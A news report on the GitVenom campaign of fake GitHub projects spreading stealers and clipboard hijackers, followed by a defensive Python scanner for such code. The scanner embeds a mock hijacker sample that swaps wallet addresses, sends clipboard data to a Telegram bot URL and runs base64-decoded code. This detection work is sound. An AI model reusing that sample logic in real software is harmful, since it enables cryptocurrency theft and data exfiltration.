An unidentified group of attackers has uploaded hundreds of fake project repositories to GitHub that deliver remote access trojans, information stealers, and clipboard hijackers, analysts at Kaspersky Lab report.
Among the counterfeit projects are a Telegram bot for managing Bitcoin wallets and a tool for automating interactions with Instagram accounts. Some of these were uploaded over two years ago.
To lend the projects an air of legitimacy and the appearance of active development, the malware authors added detailed descriptions and instruction files and artificially inflated the number of commits.
One of the malicious components is an infostealer that harvests saved credentials, cryptocurrency wallets, and browser history and sends the collected data to the attackers via Telegram. Another payload is a clipboard hijacker that watches the clipboard for cryptocurrency wallet addresses and replaces them with attacker-controlled ones.
So far one victim has been confirmed: in November 2024, 5 BTC (about $485,000 at the time of the study) was transferred from that victim to an attacker-controlled wallet.
The campaign, dubbed GitVenom, is observed worldwide, but primarily targets users in Russia, Brazil, and Turkey.
Developers are advised to check what third-party code actually does before downloading and running software from GitHub.
Earlier, experts at SecurityScorecard discovered a GitHub profile distributing new North Korean malware that swaps cryptocurrency wallets.
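A concrete way to act on that advice, as an added example that is not part of the Kaspersky report or any of the projects it describes: a small static triage script that scans a checked-out repository for the behaviours named above (clipboard access paired with hard-coded wallet addresses, which a clipboard hijacker needs in order to swap in its own destination; a Telegram Bot API endpoint as an exfiltration channel; and base64-decoded data fed straight into exec/eval). The indicator regexes, the file-extension list, and the two embedded sample sources (with placeholder wallet addresses of valid syntax) are this example's own assumptions.

```python
"""Heuristic pre-run triage of third-party code for GitVenom-style indicators.

Added example, not Kaspersky's detection logic; every pattern below is an
assumption chosen for illustration.
"""
import os
import re
import sys
from dataclasses import dataclass

# Wallet-address syntaxes a clipboard hijacker both recognises and embeds
# (its replacement addresses). Assumed patterns, loosely matching.
ADDRESS_PATTERNS = {
    "btc_legacy": re.compile(r"\b[13][a-km-zA-HJ-NP-Z1-9]{25,34}\b"),
    "btc_bech32": re.compile(r"\bbc1[ac-hj-np-z02-9]{38,59}\b"),
    "eth": re.compile(r"\b0x[0-9a-fA-F]{40}\b"),
}
# Clipboard read/write APIs across Python, Win32, browsers and shells.
CLIPBOARD_API = re.compile(
    r"\b(?:pyperclip|OpenClipboard|GetClipboardData|SetClipboardData|"
    r"clipboard\.(?:readText|writeText)|xclip|xsel|pbcopy|pbpaste)\b"
)
# Telegram Bot API endpoint used as a command/exfiltration channel.
TELEGRAM_API = re.compile(r"api\.telegram\.org/bot[0-9A-Za-z:_-]*")
# exec/eval fed directly from base64-decoded data on the same line.
OBFUSCATED_EXEC = re.compile(r"\b(?:exec|eval)\s*\([^\n]*?b64decode")

SCAN_EXTENSIONS = (".py", ".js", ".ts", ".ps1", ".sh", ".bat", ".cmd")


@dataclass
class Finding:
    indicator: str
    evidence: list


def scan_source(source: str) -> list:
    """Return one Finding per indicator class present in `source`."""
    findings = []
    addresses = sorted(
        {m.group(0) for p in ADDRESS_PATTERNS.values() for m in p.finditer(source)}
    )
    if addresses:
        findings.append(Finding("hardcoded_wallet_address", addresses))
    for name, pattern in (
        ("clipboard_access", CLIPBOARD_API),
        ("telegram_bot_api", TELEGRAM_API),
        ("obfuscated_exec", OBFUSCATED_EXEC),
    ):
        hits = sorted({m.group(0) for m in pattern.finditer(source)})
        if hits:
            findings.append(Finding(name, hits))
    return findings


def triage(source: str) -> set:
    """Combine raw indicators into the behaviours that warrant manual review."""
    present = {f.indicator for f in scan_source(source)}
    verdicts = set()
    # A hijacker must both touch the clipboard and carry a destination address;
    # either alone is common in legitimate wallet tooling.
    if {"clipboard_access", "hardcoded_wallet_address"} <= present:
        verdicts.add("possible_clipboard_hijacker")
    if "telegram_bot_api" in present:
        verdicts.add("telegram_exfiltration_channel")
    if "obfuscated_exec" in present:
        verdicts.add("obfuscated_payload")
    return verdicts


def scan_directory(root: str) -> dict:
    """Map each source file under `root` to its verdicts (files with none are omitted)."""
    results = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.endswith(SCAN_EXTENSIONS):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    verdicts = triage(fh.read())
                if verdicts:
                    results[path] = verdicts
    return results


# Constructed samples for a stand-alone run. The addresses are placeholders
# with valid syntax, not real wallets.
SUSPICIOUS_SAMPLE = r'''
import base64, re, time, pyperclip, requests
SWAP_BTC = "1AbcDefGhiJkLmNoPqRsTuVwXyZ123456"
SWAP_ETH = "0xdeadbeefdeadbeefdeadbeefdeadbeefdeadbeef"
while True:
    clip = pyperclip.paste()
    if re.fullmatch(r"[13][a-km-zA-HJ-NP-Z1-9]{25,34}", clip):
        pyperclip.copy(SWAP_BTC)
    requests.post("https://api.telegram.org/bot123:TOKEN/sendMessage", data={"text": clip})
    exec(base64.b64decode(PAYLOAD))
    time.sleep(1)
'''

BENIGN_SAMPLE = '''
import json
def load_config(path):
    with open(path) as fh:
        return json.load(fh)
'''

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path, verdicts in sorted(scan_directory(sys.argv[1]).items()):
            print(path, sorted(verdicts))
    else:
        print("suspicious:", sorted(triage(SUSPICIOUS_SAMPLE)))
        print("benign:", sorted(triage(BENIGN_SAMPLE)))
```

Run it against a cloned repository (`python triage.py path/to/repo`) before executing anything from it. The verdicts are prompts for a manual read, not a verdict on the project: a genuine Telegram bot for managing wallets will legitimately contact api.telegram.org, which is exactly why the counterfeit projects chose that cover, and a hijacker that builds its addresses at runtime or reads the clipboard through a less common API will slip past these patterns.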
